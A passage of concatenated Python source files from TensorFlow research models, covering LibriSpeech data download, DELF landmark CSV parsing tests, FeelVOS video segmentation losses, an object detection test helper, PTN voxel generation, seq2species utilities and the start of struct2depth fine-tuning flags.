"""Download and pre-process the specified list of LibriSpeech dataset.
Args:
directory: the directory to put all the downloaded and preprocessed data.
datasets: list of dataset names that will be downloaded and processed.
"""
tf.logging.info("Preparing LibriSpeech dataset: {}".format(
",".join(datasets)))
for dataset in datasets:
tf.logging.info("Preparing dataset %s", dataset)
dataset_dir = os.path.join(directory, dataset)
download_and_extract(dataset_dir, LIBRI_SPEECH_URLS[dataset])
convert_audio_and_split_transcript(
dataset_dir + "/LibriSpeech", dataset, dataset + "-wav",
dataset_dir + "/LibriSpeech", dataset + ".csv")
def define_data_download_flags():
"""Define flags for data downloading."""
absl_flags.DEFINE_string(
"data_dir", "/tmp/librispeech_data",
"Directory to download data and extract the tarball")
absl_flags.DEFINE_bool("train_only", False,
"If true, only download the training set")
absl_flags.DEFINE_bool("dev_only", False,
"If true, only download the dev set")
absl_flags.DEFINE_bool("test_only", False,
"If true, only download the test set")
def main(_):
if not tf.gfile.Exists(FLAGS.data_dir):
tf.gfile.MakeDirs(FLAGS.data_dir)
if FLAGS.train_only:
download_and_process_datasets(
FLAGS.data_dir,
["train-clean-100", "train-clean-360", "train-other-500"])
elif FLAGS.dev_only:
download_and_process_datasets(FLAGS.data_dir, ["dev-clean", "dev-other"])
elif FLAGS.test_only:
download_and_process_datasets(FLAGS.data_dir, ["test-clean", "test-other"])
else:
# By default we download the entire dataset.
download_and_process_datasets(FLAGS.data_dir, LIBRI_SPEECH_URLS.keys())
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
define_data_download_flags()
FLAGS = absl_flags.FLAGS
absl_app.run(main)
```
#### File: python/google_landmarks_dataset/dataset_file_io_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tensorflow as tf
from delf.python.google_landmarks_dataset import dataset_file_io
class DatasetFileIoTest(tf.test.TestCase):
def testReadRecognitionSolutionWorks(self):
# Define inputs.
file_path = os.path.join(tf.test.get_temp_dir(), 'recognition_solution.csv')
with tf.gfile.GFile(file_path, 'w') as f:
f.write('id,landmarks,Usage\n')
f.write('0123456789abcdef,0 12,Public\n')
f.write('0223456789abcdef,,Public\n')
f.write('0323456789abcdef,100,Ignored\n')
f.write('0423456789abcdef,1,Private\n')
f.write('0523456789abcdef,,Ignored\n')
# Run tested function.
(public_solution, private_solution,
ignored_ids) = dataset_file_io.ReadSolution(
file_path, dataset_file_io.RECOGNITION_TASK_ID)
# Define expected results.
expected_public_solution = {
'0123456789abcdef': [0, 12],
'0223456789abcdef': []
}
expected_private_solution = {
'0423456789abcdef': [1],
}
expected_ignored_ids = ['0323456789abcdef', '0523456789abcdef']
# Compare actual and expected results.
self.assertEqual(public_solution, expected_public_solution)
self.assertEqual(private_solution, expected_private_solution)
self.assertEqual(ignored_ids, expected_ignored_ids)
def testReadRetrievalSolutionWorks(self):
# Define inputs.
file_path = os.path.join(tf.test.get_temp_dir(), 'retrieval_solution.csv')
with tf.gfile.GFile(file_path, 'w') as f:
f.write('id,images,Usage\n')
f.write('0123456789abcdef,None,Ignored\n')
f.write('0223456789abcdef,fedcba9876543210 fedcba9876543200,Public\n')
f.write('0323456789abcdef,fedcba9876543200,Private\n')
f.write('0423456789abcdef,fedcba9876543220,Private\n')
f.write('0523456789abcdef,None,Ignored\n')
# Run tested function.
(public_solution, private_solution,
ignored_ids) = dataset_file_io.ReadSolution(
file_path, dataset_file_io.RETRIEVAL_TASK_ID)
# Define expected results.
expected_public_solution = {
'0223456789abcdef': ['fedcba9876543210', 'fedcba9876543200'],
}
expected_private_solution = {
'0323456789abcdef': ['fedcba9876543200'],
'0423456789abcdef': ['fedcba9876543220'],
}
expected_ignored_ids = ['0123456789abcdef', '0523456789abcdef']
# Compare actual and expected results.
self.assertEqual(public_solution, expected_public_solution)
self.assertEqual(private_solution, expected_private_solution)
self.assertEqual(ignored_ids, expected_ignored_ids)
def testReadRecognitionPredictionsWorks(self):
# Define inputs.
file_path = os.path.join(tf.test.get_temp_dir(),
'recognition_predictions.csv')
with tf.gfile.GFile(file_path, 'w') as f:
f.write('id,landmarks\n')
f.write('0123456789abcdef,12 0.1 \n')
f.write('0423456789abcdef,0 19.0\n')
f.write('0223456789abcdef,\n')
f.write('\n')
f.write('0523456789abcdef,14 0.01\n')
public_ids = ['0123456789abcdef', '0223456789abcdef']
private_ids = ['0423456789abcdef']
ignored_ids = ['0323456789abcdef', '0523456789abcdef']
# Run tested function.
public_predictions, private_predictions = dataset_file_io.ReadPredictions(
file_path, public_ids, private_ids, ignored_ids,
dataset_file_io.RECOGNITION_TASK_ID)
# Define expected results.
expected_public_predictions = {
'0123456789abcdef': {
'class': 12,
'score': 0.1
}
}
expected_private_predictions = {
'0423456789abcdef': {
'class': 0,
'score': 19.0
}
}
# Compare actual and expected results.
self.assertEqual(public_predictions, expected_public_predictions)
self.assertEqual(private_predictions, expected_private_predictions)
def testReadRetrievalPredictionsWorks(self):
# Define inputs.
file_path = os.path.join(tf.test.get_temp_dir(),
'retrieval_predictions.csv')
with tf.gfile.GFile(file_path, 'w') as f:
f.write('id,images\n')
f.write('0123456789abcdef,fedcba9876543250 \n')
f.write('0423456789abcdef,fedcba9876543260\n')
f.write('0223456789abcdef,fedcba9876543210 fedcba9876543200 '
'fedcba9876543220\n')
f.write('\n')
f.write('0523456789abcdef,\n')
public_ids = ['0223456789abcdef']
private_ids = ['0323456789abcdef', '0423456789abcdef']
ignored_ids = ['0123456789abcdef', '0523456789abcdef']
# Run tested function.
public_predictions, private_predictions = dataset_file_io.ReadPredictions(
file_path, public_ids, private_ids, ignored_ids,
dataset_file_io.RETRIEVAL_TASK_ID)
# Define expected results.
expected_public_predictions = {
'0223456789abcdef': [
'fedcba9876543210', 'fedcba9876543200', 'fedcba9876543220'
]
}
expected_private_predictions = {'0423456789abcdef': ['fedcba9876543260']}
# Compare actual and expected results.
self.assertEqual(public_predictions, expected_public_predictions)
self.assertEqual(private_predictions, expected_private_predictions)
if __name__ == '__main__':
tf.test.main()
```
#### File: feelvos/datasets/tfsequence_example_decoder.py
```python
import tensorflow as tf
slim = tf.contrib.slim
data_decoder = slim.data_decoder
class TFSequenceExampleDecoder(data_decoder.DataDecoder):
"""A decoder for TensorFlow SequenceExamples.
Decoding SequenceExample proto buffers is comprised of two stages:
(1) Example parsing and (2) tensor manipulation.
In the first stage, the tf.parse_single_sequence_example function is called
with a list of FixedLenFeatures and SparseLenFeatures. These instances tell TF
how to parse the example. The output of this stage is a set of tensors.
In the second stage, the resulting tensors are manipulated to provide the
requested 'item' tensors.
To perform this decoding operation, a SequenceExampleDecoder is given a list
of ItemHandlers. Each ItemHandler indicates the set of features for stage 1
and contains the instructions for post_processing its tensors for stage 2.
"""
def __init__(self, keys_to_context_features, keys_to_sequence_features,
items_to_handlers):
"""Constructs the decoder.
Args:
keys_to_context_features: a dictionary from TF-SequenceExample context
keys to either tf.VarLenFeature or tf.FixedLenFeature instances.
See tensorflow's parsing_ops.py.
keys_to_sequence_features: a dictionary from TF-SequenceExample sequence
keys to either tf.VarLenFeature or tf.FixedLenSequenceFeature instances.
See tensorflow's parsing_ops.py.
items_to_handlers: a dictionary from items (strings) to ItemHandler
instances. Note that the ItemHandler's are provided the keys that they
use to return the final item Tensors.
Raises:
ValueError: if the same key is present for context features and sequence
features.
"""
unique_keys = set()
unique_keys.update(keys_to_context_features)
unique_keys.update(keys_to_sequence_features)
if len(unique_keys) != (
len(keys_to_context_features) + len(keys_to_sequence_features)):
# This situation is ambiguous in the decoder's keys_to_tensors variable.
raise ValueError('Context and sequence keys are not unique. \n'
' Context keys: %s \n Sequence keys: %s' %
(list(keys_to_context_features.keys()),
list(keys_to_sequence_features.keys())))
self._keys_to_context_features = keys_to_context_features
self._keys_to_sequence_features = keys_to_sequence_features
self._items_to_handlers = items_to_handlers
def list_items(self):
"""See base class."""
return self._items_to_handlers.keys()
def decode(self, serialized_example, items=None):
"""Decodes the given serialized TF-SequenceExample.
Args:
serialized_example: a serialized TF-SequenceExample tensor.
items: the list of items to decode. These must be a subset of the item
keys in self._items_to_handlers. If `items` is left as None, then all
of the items in self._items_to_handlers are decoded.
Returns:
the decoded items, a list of tensor.
"""
context, feature_list = tf.parse_single_sequence_example(
serialized_example, self._keys_to_context_features,
self._keys_to_sequence_features)
# Reshape non-sparse elements just once:
for k in self._keys_to_context_features:
v = self._keys_to_context_features[k]
if isinstance(v, tf.FixedLenFeature):
context[k] = tf.reshape(context[k], v.shape)
if not items:
items = self._items_to_handlers.keys()
outputs = []
for item in items:
handler = self._items_to_handlers[item]
keys_to_tensors = {
key: context[key] if key in context else feature_list[key]
for key in handler.keys
}
outputs.append(handler.tensors_to_item(keys_to_tensors))
return outputs
```
#### File: feelvos/utils/train_utils.py
```python
import collections
import six
import tensorflow as tf
from deeplab.core import preprocess_utils
from deeplab.utils import train_utils
from feelvos.utils import embedding_utils
from feelvos.utils import eval_utils
slim = tf.contrib.slim
add_softmax_cross_entropy_loss_for_each_scale = (
train_utils.add_softmax_cross_entropy_loss_for_each_scale)
get_model_gradient_multipliers = train_utils.get_model_gradient_multipliers
get_model_learning_rate = train_utils.get_model_learning_rate
resolve_shape = preprocess_utils.resolve_shape
def add_triplet_loss_for_each_scale(batch_size, num_frames_per_video,
embedding_dim, scales_to_embeddings,
labels, scope):
"""Adds triplet loss for logits of each scale.
Args:
batch_size: Int, the number of video chunks sampled per batch
num_frames_per_video: Int, the number of frames per video.
embedding_dim: Int, the dimension of the learned embedding
scales_to_embeddings: A map from embedding names for different scales to
embeddings. The embeddings have shape [batch, embeddings_height,
embeddings_width, embedding_dim].
labels: Groundtruth labels with shape [batch, image_height, image_width, 1].
scope: String, the scope for the loss.
Raises:
ValueError: labels is None.
"""
if labels is None:
raise ValueError('No label for triplet loss.')
for scale, embeddings in scales_to_embeddings.iteritems():
loss_scope = None
if scope:
loss_scope = '%s_%s' % (scope, scale)
# Label is downsampled to the same size as logits.
scaled_labels = tf.image.resize_nearest_neighbor(
labels,
resolve_shape(embeddings, 4)[1:3],
align_corners=True)
# Reshape from [batch * num_frames, ...] to [batch, num_frames, ...].
h = tf.shape(embeddings)[1]
w = tf.shape(embeddings)[2]
new_labels_shape = tf.stack([batch_size, num_frames_per_video, h, w, 1])
reshaped_labels = tf.reshape(scaled_labels, new_labels_shape)
new_embeddings_shape = tf.stack([batch_size, num_frames_per_video, h, w,
-1])
reshaped_embeddings = tf.reshape(embeddings, new_embeddings_shape)
with tf.name_scope(loss_scope):
total_loss = tf.constant(0, dtype=tf.float32)
for n in range(batch_size):
embedding = reshaped_embeddings[n]
label = reshaped_labels[n]
n_pixels = h * w
n_anchors_used = 256
sampled_anchor_indices = tf.random_shuffle(tf.range(n_pixels))[
:n_anchors_used]
anchors_pool = tf.reshape(embedding[0], [-1, embedding_dim])
anchors_pool_classes = tf.reshape(label[0], [-1])
anchors = tf.gather(anchors_pool, sampled_anchor_indices)
anchor_classes = tf.gather(anchors_pool_classes, sampled_anchor_indices)
pos_neg_pool = tf.reshape(embedding[1:], [-1, embedding_dim])
pos_neg_pool_classes = tf.reshape(label[1:], [-1])
dists = embedding_utils.pairwise_distances(anchors, pos_neg_pool)
pos_mask = tf.equal(anchor_classes[:, tf.newaxis],
pos_neg_pool_classes[tf.newaxis, :])
neg_mask = tf.logical_not(pos_mask)
pos_mask_f = tf.cast(pos_mask, tf.float32)
neg_mask_f = tf.cast(neg_mask, tf.float32)
pos_dists = pos_mask_f * dists + 1e20 * neg_mask_f
neg_dists = neg_mask_f * dists + 1e20 * pos_mask_f
pos_dists_min = tf.reduce_min(pos_dists, axis=1)
neg_dists_min = tf.reduce_min(neg_dists, axis=1)
margin = 1.0
loss = tf.nn.relu(pos_dists_min - neg_dists_min + margin)
# Handle case that no positive is present (per anchor).
any_pos = tf.reduce_any(pos_mask, axis=1)
loss *= tf.cast(any_pos, tf.float32)
# Average over anchors
loss = tf.reduce_mean(loss, axis=0)
total_loss += loss
total_loss /= batch_size
# Scale the loss up a bit.
total_loss *= 3.0
tf.add_to_collection(tf.GraphKeys.LOSSES, total_loss)
def add_dynamic_softmax_cross_entropy_loss_for_each_scale(
scales_to_logits, labels, ignore_label, loss_weight=1.0,
upsample_logits=True, scope=None, top_k_percent_pixels=1.0,
hard_example_mining_step=100000):
"""Adds softmax cross entropy loss per scale for logits with varying classes.
Also adds summaries for mIoU.
Args:
scales_to_logits: A map from logits names for different scales to logits.
The logits are a list of length batch_size of tensors of shape
[time, logits_height, logits_width, num_classes].
labels: Groundtruth labels with shape [batch_size * time, image_height,
image_width, 1].
ignore_label: Integer, label to ignore.
loss_weight: Float, loss weight.
upsample_logits: Boolean, upsample logits or not.
scope: String, the scope for the loss.
top_k_percent_pixels: A float, the value lies in [0.0, 1.0]. When its
value < 1.0, only compute the loss for the top k percent pixels (e.g.,
the top 20% pixels). This is useful for hard pixel mining.
hard_example_mining_step: An integer, the training step in which the
hard exampling mining kicks off. Note that we gradually reduce the
mining percent to the top_k_percent_pixels. For example, if
hard_example_mining_step=100K and top_k_percent_pixels=0.25, then
mining percent will gradually reduce from 100% to 25% until 100K steps
after which we only mine top 25% pixels.
Raises:
ValueError: Label or logits is None.
"""
if labels is None:
raise ValueError('No label for softmax cross entropy loss.')
if top_k_percent_pixels < 0 or top_k_percent_pixels > 1:
raise ValueError('Unexpected value of top_k_percent_pixels.')
for scale, logits in six.iteritems(scales_to_logits):
loss_scope = None
if scope:
loss_scope = '%s_%s' % (scope, scale)
if upsample_logits:
# Label is not downsampled, and instead we upsample logits.
assert isinstance(logits, collections.Sequence)
logits = [tf.image.resize_bilinear(
x,
preprocess_utils.resolve_shape(labels, 4)[1:3],
align_corners=True) for x in logits]
scaled_labels = labels
else:
# Label is downsampled to the same size as logits.
assert isinstance(logits, collections.Sequence)
scaled_labels = tf.image.resize_nearest_neighbor(
labels,
preprocess_utils.resolve_shape(logits[0], 4)[1:3],
align_corners=True)
batch_size = len(logits)
num_time = preprocess_utils.resolve_shape(logits[0])[0]
reshaped_labels = tf.reshape(
scaled_labels, ([batch_size, num_time] +
preprocess_utils.resolve_shape(scaled_labels)[1:]))
for n, logits_n in enumerate(logits):
labels_n = reshaped_labels[n]
labels_n = tf.reshape(labels_n, shape=[-1])
not_ignore_mask = tf.to_float(tf.not_equal(labels_n,
ignore_label)) * loss_weight
num_classes_n = tf.shape(logits_n)[-1]
one_hot_labels = slim.one_hot_encoding(
labels_n, num_classes_n, on_value=1.0, off_value=0.0)
logits_n_flat = tf.reshape(logits_n, shape=[-1, num_classes_n])
if top_k_percent_pixels == 1.0:
tf.losses.softmax_cross_entropy(
one_hot_labels,
logits_n_flat,
weights=not_ignore_mask,
scope=loss_scope)
else:
# Only compute the loss for top k percent pixels.
# First, compute the loss for all pixels. Note we do not put the loss
# to loss_collection and set reduction = None to keep the shape.
num_pixels = tf.to_float(tf.shape(logits_n_flat)[0])
pixel_losses = tf.losses.softmax_cross_entropy(
one_hot_labels,
logits_n_flat,
weights=not_ignore_mask,
scope='pixel_losses',
loss_collection=None,
reduction=tf.losses.Reduction.NONE)
# Compute the top_k_percent pixels based on current training step.
if hard_example_mining_step == 0:
# Directly focus on the top_k pixels.
top_k_pixels = tf.to_int32(top_k_percent_pixels * num_pixels)
else:
# Gradually reduce the mining percent to top_k_percent_pixels.
global_step = tf.to_float(tf.train.get_or_create_global_step())
ratio = tf.minimum(1.0, global_step / hard_example_mining_step)
top_k_pixels = tf.to_int32(
(ratio * top_k_percent_pixels + (1.0 - ratio)) * num_pixels)
_, top_k_indices = tf.nn.top_k(pixel_losses,
k=top_k_pixels,
sorted=True,
name='top_k_percent_pixels')
# Compute the loss for the top k percent pixels.
tf.losses.softmax_cross_entropy(
tf.gather(one_hot_labels, top_k_indices),
tf.gather(logits_n_flat, top_k_indices),
weights=tf.gather(not_ignore_mask, top_k_indices),
scope=loss_scope)
pred_n = tf.argmax(logits_n, axis=-1, output_type=tf.int32)[
..., tf.newaxis]
labels_n = labels[n * num_time: (n + 1) * num_time]
miou = eval_utils.calculate_multi_object_miou_tf(pred_n, labels_n)
tf.summary.scalar('miou', miou)
def get_model_init_fn(train_logdir,
tf_initial_checkpoint,
initialize_last_layer,
last_layers,
ignore_missing_vars=False):
"""Gets the function initializing model variables from a checkpoint.
Args:
train_logdir: Log directory for training.
tf_initial_checkpoint: TensorFlow checkpoint for initialization.
initialize_last_layer: Initialize last layer or not.
last_layers: Last layers of the model.
ignore_missing_vars: Ignore missing variables in the checkpoint.
Returns:
Initialization function.
"""
if tf_initial_checkpoint is None:
tf.logging.info('Not initializing the model from a checkpoint.')
return None
if tf.train.latest_checkpoint(train_logdir):
tf.logging.info('Ignoring initialization; other checkpoint exists')
return None
tf.logging.info('Initializing model from path: %s', tf_initial_checkpoint)
# Variables that will not be restored.
exclude_list = ['global_step']
if not initialize_last_layer:
exclude_list.extend(last_layers)
variables_to_restore = slim.get_variables_to_restore(exclude=exclude_list)
if variables_to_restore:
return slim.assign_from_checkpoint_fn(
tf_initial_checkpoint,
variables_to_restore,
ignore_missing_vars=ignore_missing_vars)
return None
```
#### File: object_detection/utils/test_case.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from six.moves import zip
import tensorflow as tf
from tensorflow.contrib import tpu
flags = tf.app.flags
flags.DEFINE_bool('tpu_test', False, 'Whether to configure test for TPU.')
FLAGS = flags.FLAGS
class TestCase(tf.test.TestCase):
"""Extends tf.test.TestCase to optionally allow running tests on TPU."""
def execute_tpu(self, graph_fn, inputs):
"""Constructs the graph, executes it on TPU and returns the result.
Args:
graph_fn: a callable that constructs the tensorflow graph to test. The
arguments of this function should correspond to `inputs`.
inputs: a list of numpy arrays to feed input to the computation graph.
Returns:
A list of numpy arrays or a scalar returned from executing the tensorflow
graph.
"""
with self.test_session(graph=tf.Graph()) as sess:
placeholders = [tf.placeholder_with_default(v, v.shape) for v in inputs]
tpu_computation = tpu.rewrite(graph_fn, placeholders)
sess.run(tpu.initialize_system())
sess.run([tf.global_variables_initializer(), tf.tables_initializer(),
tf.local_variables_initializer()])
materialized_results = sess.run(tpu_computation,
feed_dict=dict(zip(placeholders, inputs)))
sess.run(tpu.shutdown_system())
if (hasattr(materialized_results, '__len__') and
len(materialized_results) == 1 and
(isinstance(materialized_results, list) or
isinstance(materialized_results, tuple))):
materialized_results = materialized_results[0]
return materialized_results
def execute_cpu(self, graph_fn, inputs):
"""Constructs the graph, executes it on CPU and returns the result.
Args:
graph_fn: a callable that constructs the tensorflow graph to test. The
arguments of this function should correspond to `inputs`.
inputs: a list of numpy arrays to feed input to the computation graph.
Returns:
A list of numpy arrays or a scalar returned from executing the tensorflow
graph.
"""
with self.test_session(graph=tf.Graph()) as sess:
placeholders = [tf.placeholder_with_default(v, v.shape) for v in inputs]
results = graph_fn(*placeholders)
sess.run([tf.global_variables_initializer(), tf.tables_initializer(),
tf.local_variables_initializer()])
materialized_results = sess.run(results, feed_dict=dict(zip(placeholders,
inputs)))
if (hasattr(materialized_results, '__len__') and
len(materialized_results) == 1 and
(isinstance(materialized_results, list) or
isinstance(materialized_results, tuple))):
materialized_results = materialized_results[0]
return materialized_results
def execute(self, graph_fn, inputs):
"""Constructs the graph, creates a test session and returns the results.
The graph is executed either on TPU or CPU based on the `tpu_test` flag.
Args:
graph_fn: a callable that constructs the tensorflow graph to test. The
arguments of this function should correspond to `inputs`.
inputs: a list of numpy arrays to feed input to the computation graph.
Returns:
A list of numpy arrays or a scalar returned from executing the tensorflow
graph.
"""
if FLAGS.tpu_test:
return self.execute_tpu(graph_fn, inputs)
else:
return self.execute_cpu(graph_fn, inputs)
```
#### File: research/ptn/model_voxel_generation.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import os
import numpy as np
from six.moves import xrange
import tensorflow as tf
import input_generator
import utils
slim = tf.contrib.slim
class Im2Vox(object):
"""Defines the voxel generation model."""
__metaclass__ = abc.ABCMeta
def __init__(self, params):
self._params = params
@abc.abstractmethod
def get_metrics(self, inputs, outputs):
"""Gets dictionaries from metrics to value `Tensors` & update `Tensors`."""
pass
@abc.abstractmethod
def get_loss(self, inputs, outputs):
pass
@abc.abstractmethod
def get_regularization_loss(self, scopes):
pass
def set_params(self, params):
self._params = params
def get_inputs(self,
dataset_dir,
dataset_name,
split_name,
batch_size,
image_size,
vox_size,
is_training=True):
"""Loads data for a specified dataset and split."""
del image_size, vox_size
with tf.variable_scope('data_loading_%s/%s' % (dataset_name, split_name)):
common_queue_min = 64
common_queue_capacity = 256
num_readers = 4
inputs = input_generator.get(
dataset_dir,
dataset_name,
split_name,
shuffle=is_training,
num_readers=num_readers,
common_queue_min=common_queue_min,
common_queue_capacity=common_queue_capacity)
images, voxels = tf.train.batch(
[inputs['image'], inputs['voxel']],
batch_size=batch_size,
num_threads=8,
capacity=8 * batch_size,
name='batching_queues/%s/%s' % (dataset_name, split_name))
outputs = dict()
outputs['images'] = images
outputs['voxels'] = voxels
outputs['num_samples'] = inputs['num_samples']
return outputs
def preprocess(self, raw_inputs, step_size):
"""Selects the subset of viewpoints to train on."""
(quantity, num_views) = raw_inputs['images'].get_shape().as_list()[:2]
inputs = dict()
inputs['voxels'] = raw_inputs['voxels']
for k in xrange(step_size):
inputs['images_%d' % (k + 1)] = []
inputs['matrix_%d' % (k + 1)] = []
for n in xrange(quantity):
selected_views = np.random.choice(num_views, step_size, replace=False)
for k in xrange(step_size):
view_selected = selected_views[k]
inputs['images_%d' %
(k + 1)].append(raw_inputs['images'][n, view_selected, :, :, :])
tf_matrix = self.get_transform_matrix(view_selected)
inputs['matrix_%d' % (k + 1)].append(tf_matrix)
for k in xrange(step_size):
inputs['images_%d' % (k + 1)] = tf.stack(inputs['images_%d' % (k + 1)])
inputs['matrix_%d' % (k + 1)] = tf.stack(inputs['matrix_%d' % (k + 1)])
return inputs
def get_init_fn(self, scopes):
"""Initialization assignment operator function used while training."""
if not self._params.init_model:
return None
is_trainable = lambda x: x in tf.trainable_variables()
var_list = []
for scope in scopes:
var_list.extend(
filter(is_trainable, tf.contrib.framework.get_model_variables(scope)))
init_assign_op, init_feed_dict = slim.assign_from_checkpoint(
self._params.init_model, var_list)
def init_assign_function(sess):
sess.run(init_assign_op, init_feed_dict)
return init_assign_function
def get_train_op_for_scope(self, loss, optimizer, scopes):
"""Train operation function for the given scope used file training."""
is_trainable = lambda x: x in tf.trainable_variables()
var_list = []
update_ops = []
for scope in scopes:
var_list.extend(
filter(is_trainable, tf.contrib.framework.get_model_variables(scope)))
update_ops.extend(tf.get_collection(tf.GraphKeys.UPDATE_OPS, scope))
return slim.learning.create_train_op(
loss,
optimizer,
update_ops=update_ops,
variables_to_train=var_list,
clip_gradient_norm=self._params.clip_gradient_norm)
def write_disk_grid(self,
global_step,
log_dir,
input_images,
gt_projs,
pred_projs,
pred_voxels=None):
"""Function called by TF to save the prediction periodically."""
summary_freq = self._params.save_every
def write_grid(input_images, gt_projs, pred_projs, pred_voxels,
global_step):
"""Native python function to call for writing images to files."""
grid = _build_image_grid(input_images, gt_projs, pred_projs, pred_voxels)
if global_step % summary_freq == 0:
img_path = os.path.join(log_dir, '%s.jpg' % str(global_step))
utils.save_image(grid, img_path)
with open(
os.path.join(log_dir, 'pred_voxels_%s' % str(global_step)),
'w') as fout:
np.save(fout, pred_voxels)
with open(
os.path.join(log_dir, 'input_images_%s' % str(global_step)),
'w') as fout:
np.save(fout, input_images)
return grid
py_func_args = [
input_images, gt_projs, pred_projs, pred_voxels, global_step
]
save_grid_op = tf.py_func(write_grid, py_func_args, [tf.uint8],
'wrtie_grid')[0]
slim.summaries.add_image_summary(
tf.expand_dims(save_grid_op, axis=0), name='grid_vis')
return save_grid_op
def _build_image_grid(input_images, gt_projs, pred_projs, pred_voxels):
"""Build the visualization grid with py_func."""
quantity, img_height, img_width = input_images.shape[:3]
for row in xrange(int(quantity / 3)):
for col in xrange(3):
index = row * 3 + col
input_img_ = input_images[index, :, :, :]
gt_proj_ = gt_projs[index, :, :, :]
pred_proj_ = pred_projs[index, :, :, :]
pred_voxel_ = utils.display_voxel(pred_voxels[index, :, :, :, 0])
pred_voxel_ = utils.resize_image(pred_voxel_, img_height, img_width)
if col == 0:
tmp_ = np.concatenate([input_img_, gt_proj_, pred_proj_, pred_voxel_],
1)
else:
tmp_ = np.concatenate(
[tmp_, input_img_, gt_proj_, pred_proj_, pred_voxel_], 1)
if row == 0:
out_grid = tmp_
else:
out_grid = np.concatenate([out_grid, tmp_], 0)
out_grid = out_grid.astype(np.uint8)
return out_grid
```
#### File: research/seq2species/seq2label_utils.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from protos import seq2label_pb2
def get_all_label_values(dataset_info):
"""Retrieves possible values for modeled labels from a `Seq2LabelDatasetInfo`.
Args:
dataset_info: a `Seq2LabelDatasetInfo` message.
Returns:
A dictionary mapping each label name to a tuple of its permissible values.
"""
return {
label_info.name: tuple(label_info.values)
for label_info in dataset_info.labels
}
def construct_seq2label_model_info(hparams, model_type, targets, metadata_path,
batch_size, num_filters,
training_noise_rate):
"""Constructs a Seq2LabelModelInfo proto with the given properties.
Args:
hparams: initialized tf.contrib.training.Hparams object.
model_type: string; descriptive tag indicating type of model, ie. "conv".
targets: list of names of the targets the model is trained to predict.
metadata_path: string; full path to Seq2LabelDatasetInfo text proto used
to initialize the model.
batch_size: int; number of reads per mini-batch.
num_filters: int; number of filters for convolutional model.
training_noise_rate: float; rate [0.0, 1.0] of base-flipping noise injected
into input read sequenced at training time.
Returns:
The Seq2LabelModelInfo proto with the hparams, model_type, targets,
num_filters, batch_size, metadata_path, and training_noise_rate fields
set to the given values.
"""
return seq2label_pb2.Seq2LabelModelInfo(
hparams_string=hparams.to_json(),
model_type=model_type,
targets=sorted(targets),
num_filters=num_filters,
batch_size=batch_size,
metadata_path=metadata_path,
training_noise_rate=training_noise_rate)
def add_read_noise(read, base_flip_probability=0.01):
"""Adds base-flipping noise to the given read sequence.
Args:
read: string; the read sequence to which to add noise.
base_flip_probability: float; probability of a base flip at each position.
Returns:
The given read with base-flipping noise added at the provided
base_flip_probability rate.
"""
base_flips = np.random.binomial(1, base_flip_probability, len(read))
if sum(base_flips) == 0:
return read
read = np.array(list(read))
possible_mutations = np.char.replace(['ACTG'] * sum(base_flips),
read[base_flips == 1], '')
mutations = map(np.random.choice, map(list, possible_mutations))
read[base_flips == 1] = mutations
return ''.join(read)
```
#### File: research/struct2depth/optimize.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import os
import random
from absl import app
from absl import flags
from absl import logging
import numpy as np
import tensorflow as tf
import model
import nets
import reader
import util
gfile = tf.gfile
SAVE_EVERY = 1 # Defines the interval that predictions should be saved at.
SAVE_PREVIEWS = True # If set, while save image previews of depth predictions.
FIXED_SEED = 8964 # Fixed seed for repeatability.
flags.DEFINE_string('output_dir', None, 'Directory to store predictions. '
'Assumes that regular inference has been executed before '
'and results were stored in this folder.')
flags.DEFINE_string('data_dir', None, 'Folder pointing to preprocessed '
'triplets to fine-tune on.')
flags.DEFINE_string('triplet_list_file', None, 'Text file containing paths to '
'image files to process. Paths should be relative with '
'respect to the list file location. Every line should be '
'of the form [input_folder_name] [input_frame_num] '
'[output_path], where [output_path] is optional to specify '
'a different path to store the prediction.')
flags.DEFINE_string('triplet_list_file_remains', None, 'Optional text file '
'containing relative paths to image files which should not '
'be fine-tuned, e.g. because of missing adjacent frames. '
'For all files listed, the static prediction will be '
'copied instead. File can be empty. If not, every line '
'should be of the form [input_folder_name] '
'[input_frame_num] [output_path], where [output_path] is '
'optional to specify a different path to take and store '
'the unrefined prediction from/to.')
flags.DEFINE_string('model_ckpt', None, 'Model checkpoint to optimize.')
flags.DEFINE_string('ft_name', '', 'Optional prefix for temporary files.')
flags.DEFINE_string('file_extension', 'png', 'Image data file extension.')
flags.DEFINE_float('learning_rate', 0.0001, 'Adam learning rate.')
flags.DEFINE_float('beta1', 0.9, 'Adam momentum.')
flags.DEFINE_float('reconstr_weight', 0.85, 'Frame reconstruction loss weight.')
flags.DEFINE_float('ssim_weight', 0.15, 'SSIM loss weight.')
flags.DEFINE_float('smooth_weight', 0.01, 'Smoothness loss weight.')
flags.DEFINE_float('icp_weight', 0.0, 'ICP loss weight.')
flags.DEFINE_float('size_constraint_weight', 0.0005, 'Weight of the object '
'size constraint loss. Use only with motion handling.')
flags.DEFINE_integer('batch_size', 1, 'The size of a sample batch')
flags.DEFINE_integer('img_height', 128, 'Input frame height.')
flags.DEFINE_integer('img_width', 416, 'Input frame width.')
flags.DEFINE_integer('seq_length', 3, 'Number of frames in sequence.')
flags.DEFINE_enum('architecture', nets.RESNET, nets.ARCHITECTURES,
'Defines the architecture to use for the depth prediction '
'network. Defaults to ResNet-based encoder and accompanying '
'decoder.')
flags.DEFINE_boolean('imagenet_norm', True, 'Whether to normalize the input '
'images channel-wise so that they match the distribution '
'most ImageNet-models were trained on.')
flags.DEFINE_float('weight_reg', 0.05, 'The amount of weight regularization to '
'apply. This has no effect on the ResNet-based encoder '
'architecture.')
flags.DEFINE_boolean('exhaustive_mode', False, 'Whether to exhaustively warp '
'from any frame to any other instead of just considering '
'adjacent frames. Where necessary, multiple egomotion '
'estimates will be applied. Does not have an effect if '
'compute_minimum_loss is enabled.')
flags.DEFINE_boolean('random_scale_crop', False, 'Whether to apply random '
'image scaling and center cropping during training.')
flags.DEFINE_bool('depth_upsampling', True, 'Whether to apply depth '
'upsampling of lower-scale representations before warping to '
'compute reconstruction loss on full-resolution image.')
flags.DEFINE_bool('depth_normalization', True, 'Whether to apply depth '
'normalization, that is, normalizing inverse depth '
'prediction maps by their mean to avoid degeneration towards '
'small values.')
